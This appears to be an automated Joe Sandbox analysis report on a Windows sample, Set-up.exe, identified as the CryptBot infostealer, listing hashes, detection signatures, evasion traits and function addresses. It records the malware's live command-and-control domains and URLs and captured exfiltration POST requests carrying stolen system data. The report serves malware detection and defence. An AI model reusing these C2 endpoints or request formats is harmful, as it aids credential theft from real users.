Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1585344
MD5:e52da29ca9214e322ba939105a9d6bb8
SHA1:d68b8830eb9422ec86519d79489b74b961b8ede9
SHA256:cdfd0e6a74e3e02b6cd8bdb70f68502354c876bcce3c897fa110ba93a3ce157a
Tags:CryptBotexeuser-aachum
Infos:

Detection

Cryptbot
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contain functionality to detect virtual machines
Infostealer behavior detected
Leaks process information
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Set-up.exe (PID: 4764 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: E52DA29CA9214E322BA939105A9D6BB8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 list": ["indohome.thirttj13vs.top", "homettj13vsj13vs.top", "thirttj13vsj13vs.top", "home.thirttj13vs.top"]}
SourceRuleDescriptionAuthorStrings
Process Memory Space: Set-up.exe PID: 4764JoeSecurity_Cryptbot_1Yara detected CryptbotJoe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4Avira URL Cloud: Label: malware
    Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJmAvira URL Cloud: Label: malware
    Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0Avira URL Cloud: Label: malware
    Source: home.thirttj13vs.topAvira URL Cloud: Label: malware
    Source: indohome.thirttj13vs.topAvira URL Cloud: Label: malware
    Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221Avira URL Cloud: Label: malware
    Source: Set-up.exe.4764.0.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["indohome.thirttj13vs.top", "homettj13vsj13vs.top", "thirttj13vsj13vs.top", "home.thirttj13vs.top"]}
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.4% probability
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01008E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_01008E90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01153F30 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_01153F30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EBF6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,0_2_00EBF6E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EC1B40 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptGetProvParam,CryptGetProvParam,GetLastError,GetLastError,CryptReleaseContext,GetLastError,CryptReleaseContext,0_2_00EC1B40
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EC1F10 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,0_2_00EC1F10
    Source: C:\Users\user\Desktop\Set-up.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00CADCF0
    Source: Set-up.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00C8255D
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C829FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_00C829FF
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E5E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_00E5E270
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_00C8255D

    Networking

    barindex
    Source: Malware configuration extractorURLs: indohome.thirttj13vs.top
    Source: Malware configuration extractorURLs: homettj13vsj13vs.top
    Source: Malware configuration extractorURLs: thirttj13vsj13vs.top
    Source: Malware configuration extractorURLs: home.thirttj13vs.top
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: POST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 562088Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 34 33 32 33 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
    Source: global trafficHTTP traffic detected: GET /jhkNTMUXVuSQJmAfrHzR1736163221?argument=0 HTTP/1.1Host: home.thirttj13vs.topAccept: */*
    Source: global trafficHTTP traffic detected: POST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox ViewIP Address: 34.147.147.173 34.147.147.173
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D4A8C0 recvfrom,0_2_00D4A8C0
    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
    Source: global trafficHTTP traffic detected: GET /jhkNTMUXVuSQJmAfrHzR1736163221?argument=0 HTTP/1.1Host: home.thirttj13vs.topAccept: */*
    Source: global trafficDNS traffic detected: DNS query: httpbin.org
    Source: global trafficDNS traffic detected: DNS query: home.thirttj13vs.top
    Source: unknownHTTP traffic detected: POST /jhkNTMUXVuSQJmAfrHzR1736163221 HTTP/1.1Host: home.thirttj13vs.topAccept: */*Content-Type: application/jsonContent-Length: 562088Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 38 34 33 32 33 31 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 07 Jan 2025 13:38:20 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Tue, 07 Jan 2025 13:38:21 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: Set-up.exeString found in binary or memory: http://.css
    Source: Set-up.exeString found in binary or memory: http://.jpg
    Source: Set-up.exeString found in binary or memory: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221
    Source: Set-up.exe, 00000000.00000003.2251997102.0000000000C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0
    Source: Set-up.exe, 00000000.00000002.2253280536.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251976781.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252171171.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2252153907.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2251997102.0000000000C0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4
    Source: Set-up.exe, 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJm
    Source: Set-up.exeString found in binary or memory: http://html4/loose.dtd
    Source: Set-up.exeString found in binary or memory: http://timestamp.digicert.com0
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: Set-up.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: Set-up.exeString found in binary or memory: https://httpbin.org/ip
    Source: Set-up.exeString found in binary or memory: https://httpbin.org/ipbefore
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C905B00_2_00C905B0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C96FA00_2_00C96FA0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CBF1000_2_00CBF100
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DF00F00_2_00DF00F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D500E00_2_00D500E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E700800_2_00E70080
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D2E0700_2_00D2E070
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F8C0500_2_00F8C050
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD00320_2_00FD0032
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0100A0000_2_0100A000
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0100E0500_2_0100E050
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F9C1A00_2_00F9C1A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F101700_2_00F10170
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DF41700_2_00DF4170
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EEE1380_2_00EEE138
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F442F00_2_00F442F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FDE2F00_2_00FDE2F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CF62E00_2_00CF62E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF62D00_2_00FF62D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CE62100_2_00CE6210
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E102000_2_00E10200
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D4E3E00_2_00D4E3E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E703500_2_00E70350
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D4C3200_2_00D4C320
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CCE4800_2_00CCE480
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA24A00_2_00DA24A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FEC4700_2_00FEC470
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_010005900_2_01000590
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF04600_2_00FF0460
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F3E4500_2_00F3E450
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD44100_2_00FD4410
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE24300_2_00DE2430
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D504200_2_00D50420
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EEE5D00_2_00EEE5D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF05600_2_00FF0560
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F426E00_2_00F426E0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_010047800_2_01004780
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8E6200_2_00C8E620
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFA6100_2_00FFA610
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EC87D00_2_00EC87D0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E6A7800_2_00E6A780
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D4C7700_2_00D4C770
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E087300_2_00E08730
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_010009400_2_01000940
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD48A00_2_00FD48A0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFA8000_2_00FFA800
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DF49F00_2_00DF49F0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C949400_2_00C94940
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8A9600_2_00C8A960
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFE9400_2_00FFE940
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D3C9000_2_00D3C900
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E56AC00_2_00E56AC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E78AC00_2_00E78AC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D06AA00_2_00D06AA0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF8BF00_2_00FF8BF0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E6ABC00_2_00E6ABC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00C8CBB00_2_00C8CBB0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F40B700_2_00F40B70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00EB0B600_2_00EB0B60
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01004D400_2_01004D40
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D32DC00_2_00D32DC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FFCD800_2_00FFCD80
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0100CC900_2_0100CC90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FF4D500_2_00FF4D50
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DE6E900_2_00DE6E90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00F7CE300_2_00F7CE30
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E6AFC00_2_00E6AFC0
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00D4EF900_2_00D4EF90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FD2F900_2_00FD2F90
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00FA6F800_2_00FA6F80
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00CA4F700_2_00CA4F70
    Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00DA8F200_2_00DA8F20
